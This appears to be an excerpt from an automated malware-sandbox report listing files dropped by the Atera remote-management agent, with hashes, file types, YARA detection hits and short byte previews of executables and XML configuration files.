                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):79920
                                                                                                                                                                                                                                        Entropy (8bit):6.066087640666245
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:WN+DIHGXi30BmKGpqfwTwL5pxa/t4csUhtcyOH7Ov+lpMEpYinAMxClmWk:C+DIUmKK0wu5jcsU7cyOH7RF7HxdWk
                                                                                                                                                                                                                                        MD5:62BE08E35D6CEBE47FB5F8A3115318F2
                                                                                                                                                                                                                                        SHA1:F2A14834BC842EB5B3A0859BB95697B72C5C4BEF
                                                                                                                                                                                                                                        SHA-256:EDD644CDD12C3E8B66A4573D185E6F446D294E32EF205FC2802DC735FD1F70B9
                                                                                                                                                                                                                                        SHA-512:CB9FECF800157A3F8B59095AEF9759CE9C3BE1019D056BBD2FA821632545EDD6DC3F5B8D8E41B648C63F21FD2FEF936DB302D706AB537D02C2801722410B9CF6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g(..........." ..0..............$... ...@....... ...............................9....`.................................I$..O....@..................0(...`.......#..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................}$......H........Y...............................................................0..........(....(.....r...p... .....r...p..(......o......(.....o......(.....o..........s......[o......s....%.o........o .....s!..........s"...%......io#...o$.....o%...(&.........,...o'......*......y.,........0..........(....(.....r...p... .....r...p..(......o......(.....o.......((.........s......[o......s....%.o........o).......s*..........s"......i.l...........io+.....(.........o,.........,...o'......*.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):953
                                                                                                                                                                                                                                        Entropy (8bit):4.9874198404771155
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JduPF7NhOXrRH2/dVxlPH2/FVQ7uH2/F9y:327O7RgdjdgFSagFw
                                                                                                                                                                                                                                        MD5:8C9F9547ABA4CD154FAA858695986C4E
                                                                                                                                                                                                                                        SHA1:667630B8AEA31C20C20EE569983B73028F0DBA21
                                                                                                                                                                                                                                        SHA-256:7DE06E53089587194D3669B5F2050B363CC2AC1BC66F0537EC4D7AD94357D46F
                                                                                                                                                                                                                                        SHA-512:C305E923A197E2C39813D423FE50D94F183E932BCC66DBEE5667AD7F4083254D50510E35ED3603555FEB4C42F580C8A1FA3D1568CC7305D22B79AB406607F836
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTray.exe (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):350256
                                                                                                                                                                                                                                        Entropy (8bit):2.897069871499034
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:erh1wSb/jb5FEH8VAynnnnnnnnnnnnnnn868m:454m
                                                                                                                                                                                                                                        MD5:E011CADB48B1465F8B1106526D1D56AC
                                                                                                                                                                                                                                        SHA1:201BA7076C90A134DEA1E20B4D0325E549928937
                                                                                                                                                                                                                                        SHA-256:015834AD82E58F2A7D4F804161D902A226AD0511285540F001F4D29974BD6B5D
                                                                                                                                                                                                                                        SHA-512:5FD577F31E243D8FD5294992F7E2B5EB1358102F254F787E7DDEB847C8623CC8D0E370F893AB3376A1B16D77AAEDFD42A02A218D6FAF025EA16904ABB44DAB59
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.........."...0......d........... ........@.. ....................................`.................................`...O........a...........0..0(..........(................................................ ............... ..H............text........ ...................... ..`.rsrc....a.......b..................@..@.reloc..............................@..B........................H........)..<$...........M..`............................................0............,t.....r...p(....-..r...p(....-..r...p(....-)+G(....(.....K...(....,.(....+*(.....3...(......,..(.... ....(....+......s.........(.... ....`(.......(....rA..p(....rQ..p.%-.&.+.o....(....(......r]..pry..p(....( ...(....,.....(!....("...(#....o$..........s%...(&...(....%(....('...r]..pr...p(....( ...((...s)........~....(*....C..r...p(....(+...((...(....rA..p(....rQ..p.%-.&.+.o....(....(......*

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTray.exe.config (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1547
                                                                                                                                                                                                                                        Entropy (8bit):5.008195800038022
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/FVruH2/+mV0PH2/+w39y:3sIk7O7RgdjdgFSagFgg+msg+w3w
                                                                                                                                                                                                                                        MD5:029F543956E8B235A70112C77912150A
                                                                                                                                                                                                                                        SHA1:8F8916C78D9D3E5F92C37BDD39D34CD3B79BECA6
                                                                                                                                                                                                                                        SHA-256:33720B1985FE3F07F13744963085FA641F452EC393C3C8987A6023D0BC493BD1
                                                                                                                                                                                                                                        SHA-512:CF6EF25E7FD7E0B04A4F76B1552621874DAAA43838D0C028E62D1AABFFCD57AC7086A174BE9D5AF283DE8E8F09B5B40505478978102A1D8351681532B3828A38
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTrayTMP.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):350256
                                                                                                                                                                                                                                        Entropy (8bit):2.897069871499034
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:erh1wSb/jb5FEH8VAynnnnnnnnnnnnnnn868m:454m
                                                                                                                                                                                                                                        MD5:E011CADB48B1465F8B1106526D1D56AC
                                                                                                                                                                                                                                        SHA1:201BA7076C90A134DEA1E20B4D0325E549928937
                                                                                                                                                                                                                                        SHA-256:015834AD82E58F2A7D4F804161D902A226AD0511285540F001F4D29974BD6B5D
                                                                                                                                                                                                                                        SHA-512:5FD577F31E243D8FD5294992F7E2B5EB1358102F254F787E7DDEB847C8623CC8D0E370F893AB3376A1B16D77AAEDFD42A02A218D6FAF025EA16904ABB44DAB59
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.........."...0......d........... ........@.. ....................................`.................................`...O........a...........0..0(..........(................................................ ............... ..H............text........ ...................... ..`.rsrc....a.......b..................@..@.reloc..............................@..B........................H........)..<$...........M..`............................................0............,t.....r...p(....-..r...p(....-..r...p(....-)+G(....(.....K...(....,.(....+*(.....3...(......,..(.... ....(....+......s.........(.... ....`(.......(....rA..p(....rQ..p.%-.&.+.o....(....(......r]..pry..p(....( ...(....,.....(!....("...(#....o$..........s%...(&...(....%(....('...r]..pr...p(....( ...((...s)........~....(*....C..r...p(....(+...((...(....rA..p(....rQ..p.%-.&.+.o....(....(......*

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTrayTMP.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1547
                                                                                                                                                                                                                                        Entropy (8bit):5.008195800038022
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/FVruH2/+mV0PH2/+w39y:3sIk7O7RgdjdgFSagFgg+msg+w3w
                                                                                                                                                                                                                                        MD5:029F543956E8B235A70112C77912150A
                                                                                                                                                                                                                                        SHA1:8F8916C78D9D3E5F92C37BDD39D34CD3B79BECA6
                                                                                                                                                                                                                                        SHA-256:33720B1985FE3F07F13744963085FA641F452EC393C3C8987A6023D0BC493BD1
                                                                                                                                                                                                                                        SHA-512:CF6EF25E7FD7E0B04A4F76B1552621874DAAA43838D0C028E62D1AABFFCD57AC7086A174BE9D5AF283DE8E8F09B5B40505478978102A1D8351681532B3828A38
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):59952
                                                                                                                                                                                                                                        Entropy (8bit):6.133539293827828
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:T6O442hHI1kIHLxnuFjBm+UuLcxVePk+CXVT+rB9ezgEpYinAMxCHC:T6O4JuxnT+UuLMcBClyrvGp7HxV
                                                                                                                                                                                                                                        MD5:D306585C7E1A4489A09FBE260C90CC26
                                                                                                                                                                                                                                        SHA1:AD6B29943CDD31D630C1A9655F3F6E9D01F593F1
                                                                                                                                                                                                                                        SHA-256:464C50D4E60CD105899C3331733D69F4CBDA94792AF2550CC35BA48BF680B3BC
                                                                                                                                                                                                                                        SHA-512:0F1E29592FF5BCB5EDA0DE6D9DC4CE1CB9214556598AED146A172C42582A22F8DF1D9B3C53A74F6624275E4C733FF20493FDD9478C5E160E1C87B8DA2E7F5F79
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ........... ....................... ......?.....`.................................m...O.......................0(..............8............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........X..0.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..s....}.....s....}.....(......o8...(...+}....*..0...........{....o.....8......(.....s.......}E.....u....}D....{D...,........s....(....&+ms.......}G.....u....}F....{F...,........s....(....&+8s.........}I......u....}H.....{H...,.........s....(....&..(....:J.............o.....*.................0..I........{....o.....{....o.....+...(

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1191
                                                                                                                                                                                                                                        Entropy (8bit):4.971943087661362
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JduPF7NhOXrRH2/dVQ7uH2/FVxlPH2/FV0PH2/+w39y:327O7RgdSagFjdgFsg+w3w
                                                                                                                                                                                                                                        MD5:B8E88B1C181AFEB535BFEA1155000E8E
                                                                                                                                                                                                                                        SHA1:EB9066E96542DCE5F35DBF2F1424FD79ACEBB65F
                                                                                                                                                                                                                                        SHA-256:5D094CC46FED5173A2B1BE4C8E5DBDB658D2C14ABD367C47DFC6F6EABD5F295C
                                                                                                                                                                                                                                        SHA-512:58459651D3358FDDD4114AB569786A2306338C08D27D3D449BE2084EAE9D4A619C5650D3699DCA6702AEFDE8F9E77FD9E56C87EF51D4A8CCB2A22A378C488C37
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\t2tWinFormAppBarLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):23088
                                                                                                                                                                                                                                        Entropy (8bit):6.501386270939045
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:vLOGTOwM15TRwLm6orgNyb8E9VF6IYinAM+oCyyfq+M9:vnMTR0PaYEpYinAMxCo+M9
                                                                                                                                                                                                                                        MD5:1E88B244EED95A3FA6110F260C409FE1
                                                                                                                                                                                                                                        SHA1:7373FA85796B566DD3DDC667F494327BC6C890FB
                                                                                                                                                                                                                                        SHA-256:FC1E9D9BD607CC4B1B1D35CACCE1A1A0501EF35B29F9C7FF110F7F3CFC6CEAAB
                                                                                                                                                                                                                                        SHA-512:2F7A814BAF52F8BD6FB7A655326225CD0A5E737B8489AC5379CD7316F508F130F0396E03B6570F7E4C4389B088CB8EC371A3D9443C8A90232ED63C6CF91479A4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\.\.........." ..0..(...........G... ...`....... ....................................`..................................F..O....`..L............2..0(...........E............................................... ............... ..H............text...4'... ...(.................. ..`.rsrc...L....`.......*..............@..@.reloc...............0..............@..B.................G......H........)..$............................................................~....*.......**...(.....*...0...........~.....o......,..~.....o......+i.s(...%.o.....%.o.....%.o.....%.o.....%.o....o ....%.o....o"....%.o....o$....%.o....o&.....~......o........+..*..0............(.......o....o.......o%...o................o!......(....}.......o!......(....}.......o!......(.....o#.......(....X}.......o!......(.....o#.......(....X}..............s..........%..o.....#....%........o ...&*...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x64\SQLite.Interop.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1817648
                                                                                                                                                                                                                                        Entropy (8bit):6.551348808770685
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:F9EeNSPwEW3cFSI4Tfm3hvbHsjAJcAMkP5:F9Nzm31PMo5
                                                                                                                                                                                                                                        MD5:D56ED44BF950BD2E5352B940E6700D37
                                                                                                                                                                                                                                        SHA1:C85A277E5F191778DB292F5A9411C6B8F0D51C81
                                                                                                                                                                                                                                        SHA-256:6C44D4A7E5FBE13ECD9379DAA1ECA36CA32FD9214F1E529350C818F26CD628D5
                                                                                                                                                                                                                                        SHA-512:AE43CCCE2439610B913D419B561568FF8C5C819917A02A693DE12CA42C60454BAF7232B48C9288C5D7BE94351EF01AECC10A71CC68FD9C725DF19AFA7EF9BBF3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nN\.. ... ... .Q..... .Q...e. .Q..... ..Q#... ..Q%... ..Q$... .8..... ..].... ...!.~. .rQ(... .rQ ... .wQ.... .rQ"... .Rich.. .........................PE..d.....d.........." ................................................................s.....`.................................................P...x................!......0(...........@..p............................A...............................................text...0........................... ..`.rdata...1.......2..................@..@.data....`... ...J..................@....pdata...!......."...P..............@..@.gfids...............r..............@..@.rsrc................t..............@..@.reloc...............~..............@..B................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x86\SQLite.Interop.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1436208
                                                                                                                                                                                                                                        Entropy (8bit):6.7813779940444565
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:ts5ThI+vIjDEzn7tcBGtYnxLbdVlRdouD5RawYkGq78Yr4i9YE1tOvhefHXCvEs2:YlI+vIjE7mjOuKa8Riy+gvhaIn2+0V
                                                                                                                                                                                                                                        MD5:11609F2057A83EC8DB79C56BC69F6A0B
                                                                                                                                                                                                                                        SHA1:0F81FF1164F2F40346A2CA8DE70E3C3226111FB0
                                                                                                                                                                                                                                        SHA-256:178E80189D0B1667B0D58653F4378D784CFEA0B924FF56FEB3844FC8D80A78EF
                                                                                                                                                                                                                                        SHA-512:039949FDB44BC96C33F6EFB00917994322FE5597388C2C5ED46A3337D6E224BDDE534E70ABDF59C6B71A62B4158A64B8679294FAFE732514FAC1B3E57460D3D4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v..{2..(2..(2..(.*W(...(.*U(...(.*T(...(..)%..(..)'..(..)=..(.Im(:..(,.5(1..(2..(...(..)3..(..)3..(..Y(3..(..)3..(Rich2..(........PE..L.....d...........!.....f...X............................................................@.........................P...t.......x....`..................0(...p..X...@...p...............................@...............H............................text....d.......f.................. ..`.rdata..............j..............@..@.data....8.......,..................@....gfids.......P.......&..............@..@.rsrc........`.......(..............@..@.reloc..X....p.......2..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):583489
                                                                                                                                                                                                                                        Entropy (8bit):7.99944408666799
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:CLLJGMlifhYeKrN8qSQDqPVK04BwQjtVcUf7DmZMilOugjC6w:GwfhYeKraZQDqPY0E/4Uf7owugjm
                                                                                                                                                                                                                                        MD5:9614D1DA18956DE06747C03068208D66
                                                                                                                                                                                                                                        SHA1:FEA2680DDB9E4CEEA8489A132DF9A1542FEBFE88
                                                                                                                                                                                                                                        SHA-256:DDE9E0CA3FD274902F1A4C22CFEC6870C6C4DBBCCAD17D2189477AB60F769DAB
                                                                                                                                                                                                                                        SHA-512:D8E46A5819E9DCED61471966646DE153BF3480933054C50190D50DE4900685265367B12C9147630F184CE8809786FC010BF6FCD1884035FB4C77CFDE660A8B9D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-......q1Y............5...AgentPackageUpgradeAgent/AgentPackageUpgradeAgent.exe....0........d.......o.H..:|p^xA......v.g.J..r:.....@..Q..H..^"]....G..... |...o.<?%....#".....3_s....c..JN.j..Vg_.....$...".,=T.=..5.b.U-..5..7"..H.....9462.._.Mb.e....&.cJ.+!:.....7H]p..#..()6~..0...|8..\......~.D..M.R..Y-[.efI...O..3..\.D.O.V."..0....l.....~.zdP.Hh.r.^R.z5 .=b.....%.X....(..E..T].'bk..ir...V...|.M....=...<..e...5... ...V./.....,....{..-.xa..s.}.e.{........y.%.LY^..HnIp.;....+.Gy.. .Z..e2.bxOy.._...L..g.F.{.C.....9......T.^.I.........NK4.a..4...cf<..@.GI..q..L7.]..f.g[.......E|{x...1....E...8..!.u..g..^%....Y.5^..|...H.....&hQ..E..i(:.6.............)A...Q=..).l..bs#5......./..Q.3..8.-......f@WV.d]i".{d[..v.p.l+.WO.]L...x<....rz#.*i......!.-.F*.:\9.%.cI.Y...=..f.\....9?.v,..}<../<c...U..C._o....'. .;..$,.. .Y......z..m.........#t.<..i..s....u...D..}5O..5O......j..O.../.%8.p.5...@....M....[rG...L.o...J2..<rS...[i<....})}....[x.....v^..=.su....Oy@g....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):55344
                                                                                                                                                                                                                                        Entropy (8bit):5.801614737823664
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:R4DgbepEIgcvDiMd+R5B153ieGuftxw5dfiGoxkEpYinAMxCN4:Rr4EIgcxdQdGuftxw5dfiZd7Hxe4
                                                                                                                                                                                                                                        MD5:D11B2139D29E79D795054C3866898B7F
                                                                                                                                                                                                                                        SHA1:020581C77ED4BC01C3F3912F304A46C12CA443E6
                                                                                                                                                                                                                                        SHA-256:11CDB5EC172389F93F80D8EFF0B9E5D4A98CFEAB6F2C0E0BC301A6895A747566
                                                                                                                                                                                                                                        SHA-512:DE5DEF2EFCBA83A4B9301DD342391C306CF68D0BB64104839DFC329B343544FD40597A2B9867FD2A8739C63081D74157ACFC9B59C0CB4878B2F5155F582A6F09
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r..f.........."...0.................. ........@.. ....................... .......M....`.................................h...O.......x...............0(..........0................................................ ............... ..H............text........ ...................... ..`.rsrc...x...........................@..@.reloc..............................@..B........................H.......pR...n...........................................................0..Y........o.......+C......o......r...p.o....t)...r...p(....,.........,..o.......&....X....i2..*..*...........$;..........8G.......0..#.......~....r/..po.......(....}.....{....(....,.rw..ps....z..{....o......r...p.o.......r...p.o....t)...}.....{.....(....,..r...p..o......}......}.....r...po.......r...p.o....t)...}.....{.....(....,..r...p..o......}......}.......,..o.........5.,..o......,..o......,..o....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe.config

                                                                                                                                                                                                                                        Download File
